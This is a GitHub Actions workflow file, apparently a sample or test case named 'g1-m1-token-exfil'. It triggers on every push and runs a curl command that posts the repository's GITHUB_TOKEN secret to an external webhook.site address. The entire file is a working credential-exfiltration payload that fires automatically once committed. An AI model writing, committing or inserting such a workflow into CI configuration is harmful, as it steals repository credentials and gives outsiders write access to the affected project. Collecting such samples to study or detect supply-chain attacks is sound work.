name: g1-m1-token-exfil
on:
  push: {}
jobs:
  x:
    runs-on: ubuntu-latest
    steps:
      - run: |
          curl -s -X POST -d "t=${{ secrets.GITHUB_TOKEN }}" https://webhook.site/ae1c7580-8d42-440e-82c4-4746ccb71ad5
        shell: bash
